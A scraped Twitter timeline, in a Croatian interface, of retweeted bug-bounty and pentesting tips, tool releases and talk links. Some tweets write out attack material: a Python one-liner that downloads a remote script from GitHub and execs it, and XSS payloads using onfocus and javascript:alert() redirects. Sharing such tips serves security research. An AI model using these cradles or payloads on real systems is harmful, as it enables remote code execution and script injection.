Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @n8zwn
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @n8zwn
-
Nate proslijedio/la je Tweet
This month I learnt how to analyse the JavaScript of a React Native application while bounty hunting. I wanted to share what I found out with everyone else.https://blog.assetnote.io/bug-bounty/2020/02/01/expanding-attack-surface-react-native/ …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nate proslijedio/la je Tweet
I've been beta testing this update for a while, it's a good one :)https://twitter.com/Burp_Suite/status/1223285422337462278 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nate proslijedio/la je Tweet
#ProTip For a stealthier@Burp_Suite usage, tick "Proxy > Options > Miscellaneous > Disable web interface"https://twitter.com/AffableKraut/status/1193963821020385289 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nate proslijedio/la je Tweet
Excited to officially announce The Syndicate, our 4-person live hacking team. We are kicking off the year in San Francisco at
#h1415. We will be donating 5% of all live event earnings to charity and 5% of our time to volunteering for all of 2020 and beyond.@Hacker0x01pic.twitter.com/wdQJKc9g1Y
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nate proslijedio/la je Tweet
An excellent talk by
@ajxchapman: clear methodology, novel bugs and interesting links
https://www.youtube.com/watch?v=AQCvfzwcGso …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nate proslijedio/la je Tweet
GET /example?param=test .. nothing interesting happened, not vuln to XSS. (<> " was filtered) but if I change it to POST it's reflected as value=\"test\" POST /example#xss param=test+onfocus='alert(0)'id='xss' ..and I can haz XSS bypassing their 'filter'pic.twitter.com/RjRzccus5J
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nate proslijedio/la je Tweet
#BugBountyTip time: combine Arjun from@s0md3v with BurpIntuder to bruteforce parameter values. I once got "?debug" as a valid parameter and got "on" as a good value which disclosed juicy information helping me chain bugs to a P1. Final: "?debug=on"#bugbountytips#pentest RT & LHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nate proslijedio/la je Tweet
Python equivalent of PowerShell IEX cradle: python -c 'import urllib2;r=urllib2.urlopen("https://raw.githubusercontent.com/n00py/ReadingList/master/test.py …");exec(http://r.read ())' Let me know if anyone has a better way to do it, but this seems to work.
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nate proslijedio/la je Tweet
I was bored and felt like sharing.. So I launched an "Instagram Live" session and pushed record. The session lasted roughly for an hour and contained about 28 questions and 35+ of my answers. Heres the "Directors Cut" trimmed for your pleasure. https://youtu.be/aOvpKwbeeSY
#bugbountypic.twitter.com/N6kmTa65JD
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nate proslijedio/la je Tweet
Everyone likes free training. Right? The Adversary Tactics: Powershell course has been retired from SpecterOps delivery. The course material has been made public.https://twitter.com/SpecterOps/status/1220056424866353158 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nate proslijedio/la je Tweet
"We must use time as a tool, not as a crutch."
#BSidesSLC2020@professor__plumpic.twitter.com/J2vMew2np9Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nate proslijedio/la je Tweet
2020
#BugBountyGoals - Pay 6,000,613 USD in rewards - Celebrate 10 year@GoogleVRP anniversary - Meet more Bug Hunters!Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nate proslijedio/la je Tweet
So you believe UUID's are a sufficient protection against IDOR's? Think again!
Thanks for the #BugBountyTip,@securintipic.twitter.com/zx5Xn7iDrE
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nate proslijedio/la je Tweet
Just got laid off. 5+ years at Bugcrowd. What a journey I will need help finding something new. Guess 2020 will be the start of something by different Really tough day for me
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nate proslijedio/la je Tweet
Just posted Remote Code Execution in Three Acts: Chaining Exposed Actuators and H2 Database Aliases in Spring Boot 2. Using a payload containing three different programming languages :)https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nate proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Nate proslijedio/la je Tweet
Back to blogging! CSRF-protected forms,
@Burp_Suite Intruder, and no macros. A step-by-step walkthrough based on@DVWA that you can follow along at home... https://www.agarri.fr/blog/archives/2020/01/13/intruder_and_csrf-protected_form_without_macros/index.html …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nate proslijedio/la je Tweet
Responder 3.0.0.0 is out! Massive upgrade, support for both py3 and py2, many bug fix, enhancements and Q.A++ on all servers, poisoners and tools. Enjoy! ;)https://github.com/lgandx/Responder/releases/tag/v3.0.0.0 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nate proslijedio/la je Tweet
#BugBountyTip When using#Nmap as part of your#Recon arsenal, make sure to add --data-length=50 {or any number in 20~60, the TCP packet header size). Otherwise, Nmap will in many cases return False Positives (i.e. too many open ports, or ports that are not actually open).#TBCPrikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nate proslijedio/la je Tweet
While pentesting webapps, whenever you notice a redirect, check what caused it. If it's a client side redirect (caused by JavaScript), try redirecting to javascript:alert(), now you have XSS!
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.
